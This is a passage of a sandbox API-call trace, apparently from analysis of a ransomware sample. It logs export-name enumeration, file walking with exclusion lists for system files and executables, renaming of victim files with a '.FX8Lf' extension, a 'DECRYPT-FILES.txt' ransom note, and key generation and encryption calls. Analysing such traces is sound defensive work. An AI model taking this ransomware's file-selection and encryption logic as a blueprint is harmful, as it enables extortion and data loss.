lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.755] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.755] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.755] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.755] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.755] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.755] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.755] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.755] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.755] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.755] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.755] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.756] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.756] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.756] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.756] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.756] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.756] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.756] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.756] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.756] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.756] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.756] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.756] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.756] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.756] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.756] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.756] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.756] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.756] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.756] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.757] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.757] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.757] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.757] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.757] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.757] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.757] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.757] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.757] lstrlenA (lpString="DELETEATOM") returned 10 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.757] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.757] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.757] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.757] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.757] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.757] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.757] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.757] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.757] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.757] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.758] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.758] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.758] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.758] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.758] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.758] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.758] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.758] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.758] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.758] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.758] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.758] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.758] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.758] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.758] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.758] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.758] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.758] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.758] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.759] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.759] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.759] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.759] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.759] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.759] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.759] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.759] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.759] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.759] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.759] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.759] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.759] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.759] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.759] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.760] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 59 [0082.760] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.FX8Lf") returned 65 [0082.760] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.FX8Lf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.fx8lf"), dwFlags=0x0) returned 1 [0082.760] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.760] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.760] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.761] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad75ff20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xad75ff20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad786080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0082.761] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0082.761] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0082.761] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0082.761] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0082.761] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0082.761] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0082.761] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad75ff20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xad75ff20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad75ff20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0082.761] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0082.761] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.761] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0082.761] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0082.761] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0082.761] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0082.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.761] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.761] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0082.761] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\jkbimi8.tmp" [0082.761] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.762] CloseHandle (hObject=0x0) returned 0 [0082.762] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.762] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="DECRYPT-FILES.txt") returned 1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="autorun.inf") returned 1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="boot.ini") returned 1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="desktop.ini") returned 1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="ntuser.dat") returned -1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="iconcache.db") returned 1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="bootsect.bak") returned 1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="ntuser.dat.log") returned -1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="thumbs.db") returned -1 [0082.762] lstrcmpiW (lpString1="lulcit amkdfe.contact", lpString2="Bootfont.bin") returned 1 [0082.762] lstrlenW (lpString="lulcit amkdfe.contact") returned 21 [0082.762] lstrcmpiW (lpString1="contact", lpString2="lnk") returned -1 [0082.762] lstrcmpiW (lpString1="contact", lpString2="exe") returned -1 [0082.762] lstrcmpiW (lpString1="contact", lpString2="sys") returned -1 [0082.762] lstrcmpiW (lpString1="contact", lpString2="dll") returned -1 [0082.763] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.763] lstrlenW (lpString="lulcit amkdfe.contact") returned 21 [0082.763] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0082.763] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="lulcit amkdfe.contact" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" [0082.763] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.764] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=1174) returned 1 [0082.764] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.764] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.765] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.766] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.766] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.766] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.766] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.766] VirtualFree (lpAddress=0x10e0000, 